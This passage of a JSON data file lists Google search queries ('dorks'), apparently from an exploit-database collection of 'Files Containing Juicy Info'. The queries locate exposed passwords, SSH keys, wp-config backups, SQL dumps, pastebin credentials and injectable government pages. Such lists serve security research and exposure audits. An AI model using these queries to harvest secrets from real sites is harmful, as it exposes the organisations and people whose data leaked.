Google Dork: inurl:robots.txt filetype:txt intext:cgi-bin\r\n# Files Containing Juicy Info\r\n# Date:13/10/2021\r\n# Exploit Author: Golam Rabbany"}, {"dork": "intitle:\"Index of\" inurl:data/plugins/", "description": "# Google Dork: intitle:\"Index of\" inurl:data/plugins/\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Chirag Prajapati"}, {"dork": "Google Dork: intitle:\"Index of\" \"Apache/2.4.50\"", "description": "# Google Dork: intitle:\"Index of\" \"Apache/2.4.50\"\r\n# Files Containing Juicy Info\r\n# Date:13/10/2021\r\n# Exploit Author: Roshdy Essam"}, {"dork": "site:*/node_modules/ content:\"ssh\"", "description": "# Google Dork: site:*/node_modules/ content:\"ssh\"\r\n# Files Containing Juicy Info\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "site:*/node_modules/ content:\"PEM\"", "description": "# Google Dork: site:*/node_modules/ content:\"PEM\"\r\n# Files Containing Juicy Info\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"index of\" \"schema.mysql\"", "description": "# Google Dork: intitle:\"index of\" \"schema.mysql\"\r\n# Files Containing Juicy Info\r\n# Date:12/10/2021\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "intitle:\"Pi-hole - raspberrypi\"", "description": "# Google Dork: intitle:\"Pi-hole - raspberrypi\"\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Cristi Vlad"}, {"dork": "inurl:\"/responsible disclosure\"", "description": "# Google Dork: inurl:\"/responsible disclosure\"\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:\"index of\" \"console\"", "description": "# Google Dork: intitle:\"index of\" \"console\"\r\n# Files Containing Juicy Info\r\n# Date: 14/10/2021 \r\n# Exploit Author: ethicalsubbu"}, {"dork": "intitle:\"index of\" \"logs\"", "description": "# Google Dork: intitle:\"index of\" \"logs\"\r\n# Files Containing Juicy Info\r\n# Date:14/10/2021\r\n# Exploit Author: Prakash Ganesh"}, {"dork": "index of / inurl:/pki/", "description": "# Google Dork: index of / inurl:/pki/\r\n# Files Containing Juicy Info\r\n# Date:15/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intext:\"index of/\" \"top secret\" gov", "description": "# Google Dork: intext:\"index of/\" \"top secret\" gov\r\n# Files Containing Juicy Info\r\n# Date:15/10/2021\r\n# Exploit Author: Syed Sadam"}, {"dork": "inurl:/servicedesk/customer/user/signup", "description": "# Google Dork: inurl:/servicedesk/customer/user/signup\r\n# Files Containing Juicy Info\r\n# Date:16/10/2021\r\n# Exploit Author: Aman Rawat"}, {"dork": "inurl:wp-content/plugins/easy-wp-smtp", "description": "# Google Dork: inurl:wp-content/plugins/easy-wp-smtp\r\n# Files Containing Juicy Info\r\n# Date:16/10/2021\r\n# Exploit Author: Pratik Dabhi"}, {"dork": "inurl:\"/app/kibana#\"", "description": "# Google Dork: Re: inurl:\"/app/kibana#\"\r\n# Files Containing Juicy Info\r\n# Date:17/10/2021\r\n# Exploit Author: Sandesh Ajgekar"}, {"dork": "intext:\"adobe coldfusion 8\"", "description": "# Google Dork: intext:\"adobe coldfusion 8\"\r\n# Files Containing Juicy Info\r\n# Date:18/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "Fwd: intitle:\"Authorize application\" \"Learn more about OAuth\"", "description": "# Google Dork: intitle:\"Authorize application\" \"Learn more about OAuth\"\r\n# Files Containing Juicy Info\r\n# Date: 20/10/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/wp-content/plugins/elementor/", "description": "# Google Dork: inurl:/wp-content/plugins/elementor/\r\n# Files Containing Juicy Info\r\n# Date:20/10/2021\r\n# Exploit Author: samarth dad"}, {"dork": "inurl:/wp-content/plugins/wp-filebase/", "description": "# Google Dork: inurl:/wp-content/plugins/wp-filebase/\r\n# Files Containing Juicy Info\r\n# Date:20/10/2021\r\n# Exploit Author: samarth dad"}, {"dork": "inurl:\"app.yaml\" intext:\"runtime: \" ext:yaml", "description": "# Google Dork: inurl:\"app.yaml\" intext:\"runtime: \" ext:yaml\r\n# Files Containing Juicy Info\r\n# Date:22/10/2021\r\n# Exploit Author: Cristi Vlad"}, {"dork": "inurl: https://app.zerocopter.com/rd/", "description": "# Google Dork: inurl: https://app.zerocopter.com/rd/\r\n# Files Containing Juicy Info\r\n# Date:23/10/2021\r\n# Exploit Author: Akash Patil"}, {"dork": "intitle:index.of conf.mysql", "description": "# Google Dork: intitle:index.of conf.mysql\r\n# Files Containing Juicy Info\r\n# Date:23/10/2021\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "intext:\"password\" intitle:\"index of\"", "description": "# Google Dork: intext:\"password\" intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date:23/10/2021\r\n# Exploit Author: Morsheduzzaman Arman"}, {"dork": "inurl:\"robots\" | \"robot\" intext:\"admin\" AND \"Disallow\" ext:txt", "description": "# Google Dork: inurl:\"robots\" | \"robot\" intext:\"admin\" AND \"Disallow\" ext:txt\r\n# Files Containing Juicy Info\r\n# Date:25/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" \"mongod*\"", "description": "# Google Dork: intitle:\"index of\" \"mongod*\"\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Tanvir Rayhan"}, {"dork": "intitle:index.of wp.login", "description": "# Google Dork: intitle:index.of wp.login\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "inurl:/wp-content/plugins/simple-forum/admin/", "description": "# Google Dork: inurl:/wp-content/plugins/simple-forum/admin/\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Na\u00efm Gallouj"}, {"dork": "intitle:index.of /Snowflake /robots.txt", "description": "# Google Dork: intitle:index.of /Snowflake /robots.txt\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Nayan Chandra"}, {"dork": "intitle:\"index of\" \".env.example\"", "description": "# Google Dork: intitle:\"index of\" \".env.example\"\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:index of cv site:.com", "description": "# Google Dork: intitle:index of cv site:.com\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "intext:swagger filetype:log", "description": "# Google Dork: intext:swagger filetype:log\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Matheus Bolela"}, {"dork": "intitle:\"index of\" \"server.properties\"", "description": "# Google Dork: intitle:\"index of\" \"server.properties\"\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Tanvir Rayhan"}, {"dork": "Index of /apidoc/api-web/target/classes/", "description": "# Google Dork: Index of /apidoc/api-web/target/classes/\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: Faisal Habib"}, {"dork": "intitle:\"password reset\"", "description": "# Google Dork: intitle:\"password reset\"\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "intitle:index.of /CMS /robots.txt", "description": "# Google Dork: intitle:index.of /CMS /robots.txt\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:\"index of\" \"server.log\"", "description": "# Google Dork: intitle:\"index of\" \"server.log\"\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:\"index of\" \"/backup/sql\"", "description": "# Google Dork: intitle:\"index of\" \"/backup/sql\"\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: reza abasi"}, {"dork": "site:pastebin.com intext:license key | expiration", "description": "# Google Dork: site:pastebin.com intext:license key | expiration\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "site:pastebin.com intext:username | password | secret_key | token", "description": "# Google Dork: site:pastebin.com intext:username | password | secret_key | token\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "intitle:index.of /email /robots.txt", "description": "# Google Dork: intitle:index.of /email /robots.txt\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:index.of /cftp /robots.txt", "description": "# Google Dork: # Google Dork: intitle:index.of /cftp /robots.txt\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "allinurl:index.php?page= site:.gov.in", "description": "# Google Dork: allinurl:index.php?page= site:.gov.in\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "\"inurl:php?id=\" site:.gov.bd", "description": "# Google Dork: \"inurl:php?id=\" site:.gov.bd\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "Index of /vendor/spatie/robots-txt", "description": "# Google Dork: Index of /vendor/spatie/robots-txt\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Faisal Habib"}, {"dork": "intitle:\"index of\" \".private.xml\"", "description": "# Google Dork: intitle:\"index of\" \".private.xml\"\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Chinmay Divekar"}, {"dork": "site:pastebin.com intext:\"administrator:500:\"", "description": "# Google Dork: site:pastebin.com intext:\"administrator:500:\"\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "\"inurl:php?id=\" site:.com", "description": "# Google Dork: \"inurl:php?id=\" site:.com\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "intitle:\"index of\" \".ppt\"", "description": "# Google Dork: intitle:\"index of\" \".ppt\"\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "site:github.com intext:\"unattend xmlns\" AND \"password\" ext:xml", "description": "# Google Dork: site:github.com intext:\"unattend xmlns\" AND \"password\" ext:xml\r\n# Files Containing Juicy Info\r\n# Date: 29/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" \"workspace.xml\"", "description": "# Google Dork: intitle:\"index of\" \"workspace.xml\"\r\n# Files Containing Juicy Info\r\n# Date: 29/10/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"index of\" \"-qpf\"", "description": "# Google Dork: intitle:\"index of\" \"-qpf\"\r\n# Files Containing Juicy Info\r\n# Date:30/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"-ipk\"", "description": "# Google Dork: intitle:\"index of\" \"-ipk\"\r\n# Files Containing Juicy Info\r\n# Date:30/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"Packages.gz\"", "description": "# Google Dork: intitle:\"index of\" \"Packages.gz\"\r\n# Files Containing Juicy Info\r\n# Date:30/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"mips32el-nf\"", "description": "# Google Dork: intitle:\"index of\" \"mips32el-nf\"\r\n# Files Containing Juicy Info\r\n# Date:30/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \".phpunit.xml\"", "description": "# Google Dork: intitle:\"index of\" \".phpunit.xml\"\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"index of\" \" .AndroidManifest.xml\"", "description": "# Google Dork: intitle:\"index of\" \" .AndroidManifest.xml\"\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"Index of /\" intext:\"pass.txt\"", "description": "# Google Dork: intitle:\"Index of /\" intext:\"pass.txt\"\r\n# Files Containing Juicy Info\r\n# Date:31/10/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "inurl:WS_FTP.log", "description": "# Google Dork: inurl:WS_FTP.log\r\n# Files Contaning Juicy Info\r\n# Date:31/10/2021 \r\n# Exploit Author: Suvam CyberSec"}, {"dork": "intext:\"Index of\" \"email.txt\"", "description": "# Google Dork: intext:\"Index of\" \"email.txt\"\r\n# Files Containing Juicy Info\r\n# Date:31/10/2021\r\n# Exploit Author: Parshwa Bhavsar"}, {"dork": "intitle:\"index of\" \"pptx\"", "description": "# Google Dork: intitle:\"index of\" \"pptx\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"ppt.html\"", "description": "# Google Dork: intitle:\"index of\" \"ppt.html\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"slides-ppt\"", "description": "# Google Dork: intitle:\"index of\" \"slides-ppt\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"-XML.pdf \"", "description": "# Google Dork: intitle:\"index of\" \"-XML.pdf \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"XML \"", "description": "# Google Dork: intitle:\"index of\" \"XML \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"XML.Xerces \"", "description": "# Google Dork: intitle:\"index of\" \"XML.Xerces \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"infn.it\"", "description": "# Google Dork: intitle:\"index of\" \"infn.it\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"lngs.infn.it \"", "description": "# Google Dork: intitle:\"index of\" \"lngs.infn.it \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"extra\"", "description": "# Google Dork: intitle:\"index of\" \"extra\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"extranet\"", "description": "# Google Dork: intitle:\"index of\" \"extranet\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"fsi\"", "description": "# Google Dork: intitle:\"index of\" \"fsi\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"oxid-esales\"", "description": "# Google Dork: intitle:\"index of\" \"oxid-esales\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"wp-content\"", "description": "# Google Dork: intitle:\"index of\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"css\"", "description": "# Google Dork: intitle:\"index of\" \"css\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"CD.pdf \"", "description": "# Google Dork: intitle:\"index of\" \"CD.pdf \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"DOCS-TECH \"", "description": "# Google Dork: intitle:\"index of\" \"DOCS-TECH \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" Server-Side \"", "description": "# Google Dork: intitle:\"index of\" \" Server-Side \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" py-text\"", "description": "# Google Dork: intitle:\"index of\" \"py-text\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "Google Dork", "description": "# Google Dork: intitle:\"index of\" \"-admin\"\r\n# Files Containing Juicy Info\r\n# Date:2/11/2021\r\n# Exploit Author: Tushar Jaiswal"}, {"dork": "Google Dork", "description": "# Google Dork: intitle:\"index of\" \"-pwd\"\r\n# Files Containing Juicy Info\r\n# Date:2/11/2021\r\n# Exploit Author: Tushar Jaiswal"}, {"dork": "Google Dork", "description": "# Google Dork: intitle:\"index of\" \"-.sql\"\r\n# Files Containing Juicy Info\r\n# Date:2/11/2021\r\n# Exploit Author: Tushar Jaiswal"}, {"dork": "intitle:\"index of\" \"htdocs\"", "description": "# Google Dork: intitle:\"index of\" \"htdocs\"\r\n# Files Containing Juicy Info\r\n# Date:2/11/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"index of\" \" unidecode\"", "description": "# Google Dork: intitle:\"index of\" \" unidecode\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" cldr-data\"", "description": "# Google Dork: intitle:\"index of\" \" cldr-data\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" gettext\"", "description": "# Google Dork: intitle:\"index of\" \" gettext\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" src \"", "description": "# Google Dork: intitle:\"index of\" \" src \"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" src.hint\"", "description": "# Google Dork: intitle:\"index of\" \" src.hint\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"tar.xz\"", "description": "# Google Dork: intitle:\"index of\" \"tar.xz\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"pkgs\"", "description": "# Google Dork: intitle:\"index of\" \"pkgs\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"ftp.riken", "description": "# Google Dork: intitle:\"index of\" \"ftp.riken\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"pub\"", "description": "# Google Dork: intitle:\"index of\" \"pub\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"cygwin\"", "description": "# Google Dork: intitle:\"index of\" \"cygwin\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"kde-l10n-de\"", "description": "# Google Dork: intitle:\"index of\" \"kde-l10n-de\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"txdot\"", "description": "# Google Dork: intitle:\"index of\" \"txdot\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"mirror.koddos.net\"", "description": "# Google Dork: intitle:\"index of\" \"mirror.koddos.net\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"Squid-cache\"", "description": "# Google Dork: intitle:\"index of\" \"Squid-cache\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"-login.php\"", "description": "# Google Dork: intitle:\"index of\" \"-login.php\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"metin\"", "description": "# Google Dork: intitle:\"index of\" \"metin\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"html-en\"", "description": "# Google Dork: intitle:\"index of\" \"html-en\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"html-intro\"", "description": "# Google Dork: intitle:\"index of\" \"html-intro\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"echo-linux\"", "description": "# Google Dork: intitle:\"index of\" \"echo-linux\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"filelist.xml\"", "description": "# Google Dork: intitle:\"index of\" \"filelist.xml\"\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"master01\"", "description": "# Google Dork: intitle:\"index of\" \"master01\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intext:\"password\" | \"passwd\" | \"pwd\" site:anonfiles.com", "description": "# Google Dork: intext:\"password\" | \"passwd\" | \"pwd\" site:anonfiles.com \r\n# Date: 04/11/2021\r\n# Files Containing Juicy Info\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "site:*.example.com inurl:(elmah.axd | errorlog.axd) ext:axd", "description": "# Google Dork: *site: .example.com inurl:(elmah.axd | errorlog.axd) ext:axd\r\n# Category: Files Containing Juicy Info\r\n# Date: 03-11-2021\r\n# Description: This dork can be used to identify public elmah instances which provides access to information about requests and responses, Session cookies, Session state, Query string and post variables, Physical path of the requested file of the application.\r\n# Author: Girish"}, {"dork": "inurl:errorlog.axd ext:axd", "description": "# Google Dork: inurl:errorlog.axd ext:axd\r\n# Category: Files Containing Juicy Info\r\n# Date: 03-11-2021\r\n# Author: Girish\r\n# Description: This dork can be used to identify public elmah instances which provides access to information about requests and responses, Session cookies, Session state, Query string and post variables, Physical path of the requested file of the application."}, {"dork": "showing putty logs", "description": "# Google Dork: filetype:log username putty\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Shubh Mishra"}, {"dork": "intitle:\"index of\" \"script.js\"", "description": "# Google Dork: intitle:\"index of\" \"script.js\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"admin-config\"", "description": "# Google Dork: intitle:\"index of\" \"admin-config\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"admin.login.php\"", "description": "# Google Dork: intitle:\"index of\" \"admin.login.php\"\r\n# Files Containing Juicy Info\r\n# Date: 03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"admin.login.php\"", "description": "# Google Dork: intitle:\"index of\" \"admin.login.php\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" wp-mail-smtp\"", "description": "# Google Dork: intitle:\"index of\" \" wp-mail-smtp\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"/resources\"", "description": "# Google Dork: intitle:\"index of\" \"/resources\"\r\n# Files Containing Juicy Info\r\n# Date:4/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intext:\"index of\" \"ftp\"", "description": "# Google Dork: intext:\"index of\" \"ftp\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:\"index of\" \"untitled\"", "description": "# Google Dork: intitle:\"index of\" \"untitled\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of\" \"untitled\" \"wp-content\" intext:scanned", "description": "# Google Dork: intitle:\"index of\" \"untitled\" \"wp-content\" intext:scanned\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of :\"uploads\" \"parent\" \"salary\" intext:salary", "description": "# Google Dork: index of :\"uploads\" \"parent\" \"salary\" intext:salary\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of :wp-config.zip", "description": "# Google Dork: index of :wp-config.zip\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of\" \".ssh/authorized_keys\"", "description": "# Google Dork: intitle:\"index of\" \".ssh/authorized_keys\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "Intitle:database ext:sql", "description": "# Google Dork: Intitle:database ext:sql\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"parent directory\" \"uploads\"", "description": "# Google Dork: index of: \"parent directory\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"confidential\" \"uploads\"", "description": "# Google Dork: index of: \"confidential\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"cache\" \"uploads\"", "description": "# Google Dork: index of: \"cache\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"QRcodes\" \"uploads\"", "description": "# Google Dork: index of: \"QRcodes\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"contracts\" \"uploads\"", "description": "# Google Dork: index of: \"contracts\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of : \"phonebook \"", "description": "# Google Dork: index of : \"phonebook \"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of : \"truecaller\" \"uploads\"", "description": "# Google Dork: index of : \"truecaller\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"license\" \"upload\"", "description": "# Google Dork: sindex of: \"license\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"certificate\" \"upload\"", "description": "# Google Dork: index of: \"certificate\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"certificate\" \"wp-content\"", "description": "# Google Dork: index of: \"certificate\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"application\" \"upload\"", "description": "# Google Dork: index of: \"application\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"application form\" \"upload\"", "description": "# Google Dork: index of: \"application form\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"documents\" \"wp-content\"", "description": "# Google Dork: index of: \"documents\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of\" \"_vti_inf.html\"", "description": "# Google Dork: intitle:\"index of\" \"_vti_inf.html\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"service.pwd\"", "description": "# Google Dork: intitle:\"index of\" \"service.pwd\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"shtml.dll \"", "description": "# Google Dork: 